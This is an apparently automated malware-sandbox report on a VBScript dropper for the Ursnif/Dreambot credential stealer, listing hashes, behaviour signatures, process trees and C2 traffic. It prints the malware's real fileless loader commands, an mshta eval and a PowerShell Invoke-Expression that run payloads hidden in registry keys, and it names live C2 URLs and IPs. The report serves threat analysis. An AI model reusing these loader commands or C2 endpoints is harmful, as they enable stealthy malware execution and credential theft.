analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ticket.vbs

Full analysis: https://app.any.run/tasks/4f5dd919-4254-4046-be99-477fc587e14b
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: September 19, 2019, 05:40:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
gozi
ursnif
dreambot
evasion
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

54FE2BB31C7E40D2778DCCEAF1771BBF

SHA1:

6A9190086174ECC42607FBC7689DD6193864D59E

SHA256:

6B1099C73D33285C8CD6313FA0342E6A40F3890709D305E4522E3A406123A1B4

SSDEEP:

24576:wJoLWXjGxPNfyt+gUhW5X18ccI7cI/MPsW+ovxg09jE8Vdf9:wuLWXjust+gUhW5X18cx7hMd1xHjE8V/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • zydnzZz.exe (PID: 2788)
    • URSNIF was detected

      • iexplore.exe (PID: 3584)
      • iexplore.exe (PID: 3372)
      • iexplore.exe (PID: 2580)
    • Connects to CnC server

      • iexplore.exe (PID: 3584)
      • iexplore.exe (PID: 3372)
      • iexplore.exe (PID: 2580)
    • Starts Visual C# compiler

      • powershell.exe (PID: 4000)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3352)
    • Runs injected code in another process

      • powershell.exe (PID: 4000)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3960)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 276)
    • Application was injected by another process

      • explorer.exe (PID: 276)
    • Stealing of credential data

      • explorer.exe (PID: 276)
  • SUSPICIOUS

    • Executed via WMI

      • zydnzZz.exe (PID: 2788)
    • Executes scripts

      • explorer.exe (PID: 276)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3016)
    • Executed via COM

      • iexplore.exe (PID: 3500)
      • iexplore.exe (PID: 3456)
      • iexplore.exe (PID: 2600)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 276)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 276)
    • Creates files in the user directory

      • powershell.exe (PID: 4000)
    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 276)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 276)
    • Checks for external IP

      • nslookup.exe (PID: 3072)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 3500)
      • iexplore.exe (PID: 3456)
      • iexplore.exe (PID: 2600)
    • Application launched itself

      • iexplore.exe (PID: 3500)
      • iexplore.exe (PID: 3456)
      • iexplore.exe (PID: 2600)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3584)
      • iexplore.exe (PID: 3372)
      • iexplore.exe (PID: 2580)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3584)
      • iexplore.exe (PID: 3372)
      • iexplore.exe (PID: 2580)
      • mshta.exe (PID: 3960)
    • Manual execution by user

      • mshta.exe (PID: 3960)
      • cmd.exe (PID: 3352)
    • Reads settings of System Certificates

      • explorer.exe (PID: 276)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
21
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject wscript.exe zydnzzz.exe no specs iexplore.exe #URSNIF iexplore.exe iexplore.exe no specs #URSNIF iexplore.exe iexplore.exe #URSNIF iexplore.exe mshta.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs ping.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs makecab.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3016"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ticket.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2788C:\Users\admin\AppData\Local\Temp\zydnzZz.exeC:\Users\admin\AppData\Local\Temp\zydnzZz.exewmiprvse.exe
User:
admin
Company:
Duckcircle BigMachines
Integrity Level:
MEDIUM
Description:
ShouldCreate
Exit code:
0
Version:
15.5.66.67
3500"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3584"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3500 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3456"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3372"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3456 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2600"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2580"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2600 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3960"C:\Windows\System32\mshta.exe" "about:<hta:application><script>moveTo(-898,-989);resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Devivmgr'));if(!window.flag)close()</script>"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4000"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression ([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty "HKCU:Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB").crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 867
Read events
1 630
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
10
Text files
18
Unknown types
4

Dropped files

PID
Process
Filename
Type
3016WScript.exeC:\Users\admin\AppData\Local\Temp\cIbHOuU.txt
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF2CA76486527DB825.TMP
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{333879B8-DAA0-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFCD651E69F3C05DD0.TMP
MD5:
SHA256:
3500iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{333879B7-DAA0-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
3456iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3456iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFA9AD5A189028AE9F.TMP
MD5:
SHA256:
3456iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{4061547A-DAA0-11E9-B86F-5254004A04AF}.dat
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
15
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3372
iexplore.exe
GET
404
216.58.207.69:80
http://gmail.com/images/AQcMLpm4WPpRODBdM/wGppbnow_2Bu/Df8O5EAqn7D/Ojwo6piyer7oMN/k_2BXckjhm9JXN1sCq9ML/t2sgZ5MOEmJG7l_2/FTrB_2B3X2MGKyY/D3ikgagjPFqrvWmJQV/DEbbb_2FK/Yh4224OWAfHZLKdOpsKX/ELxmwbBNZy1tlR4gul7/feK6x2yJ/x.avi
US
html
1.72 Kb
shared
3584
iexplore.exe
GET
404
172.217.22.46:80
http://google.com/images/gcM_2BKrsf5B_2B5jcGCT/wpXdlQGldyXNbFU0/tAbQ9yH2S8hDUqs/0p4RLVNF1NagxNjrW7/UlLeYyLGW/XiF8Na7syhM4_2BEaMiw/940Iq0DF6lM9FqVImXv/wa69SA88e09_2BesYCwp1U/LTjaV3yhe/94chTlNe/z.avi
US
html
1.70 Kb
whitelisted
2580
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/xxTWF1YSgaIxzw/VCRbm6TV8OlfcoCC_2FN_/2BPKw7BVAonGJzNa/WRo3NDS348Mq5yN/j_2FD_2Bg13U9cTFPU/W5vF9afSH/UPodgfWhDACa39xxWGYB/LoV9vcDZtl6eXBNdWtl/5db1YFhSklYGj4PJaWK1IA/kE5tXM2aHxMVw/60Zdk1V3/I8Hz.avi
DE
text
213 Kb
malicious
2600
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/favicon.ico
DE
image
5.30 Kb
malicious
2580
iexplore.exe
GET
200
185.49.68.108:80
http://185.49.68.108/images/KD28MmG4y_/2FF9Icg8s5UOi6NfN/qqxWPBxR_2BJ/_2FiEypPJyv/DOp3uWZawYEDcu/jJqNceMYlWxqqdc_2FwyS/JF2fk2eeEQvtKUEx/0qUgqrm_2B3_2Fs/7XqKSRtcjbSVaHL4ou/5VZPov_2F/ZM_2BflV6gx/N0ZcKqvirg6/i.avi
DE
text
2.32 Kb
malicious
3584
iexplore.exe
GET
200
172.217.18.4:80
http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
US
image
3.10 Kb
whitelisted
3584
iexplore.exe
GET
200
172.217.18.4:80
http://www.google.com/images/errors/robot.png
US
image
6.18 Kb
whitelisted
3500
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
276
explorer.exe
GET
200
95.101.72.115:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
57.0 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3372
iexplore.exe
216.58.207.69:80
gmail.com
Google Inc.
US
whitelisted
2600
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious
3584
iexplore.exe
172.217.22.46:80
google.com
Google Inc.
US
whitelisted
3584
iexplore.exe
172.217.18.4:80
www.google.com
Google Inc.
US
whitelisted
3500
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2580
iexplore.exe
185.49.68.108:80
Leaseweb Deutschland GmbH
DE
malicious
276
explorer.exe
172.217.22.46:443
google.com
Google Inc.
US
whitelisted
3072
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
276
explorer.exe
216.58.207.69:443
gmail.com
Google Inc.
US
whitelisted
276
explorer.exe
151.106.56.169:443
US
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
google.com
  • 172.217.22.46
whitelisted
www.google.com
  • 172.217.18.4
whitelisted
gmail.com
  • 216.58.207.69
shared
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 85.17.73.119
shared
www.download.windowsupdate.com
  • 95.101.72.115
  • 95.101.72.131
whitelisted

Threats

PID
Process
Class
Message
3584
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3372
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy:Win32/Dreambot/Ursnif
2580
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot/Ursnif HTTP GET Check-in
3072
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
3072
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
9 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144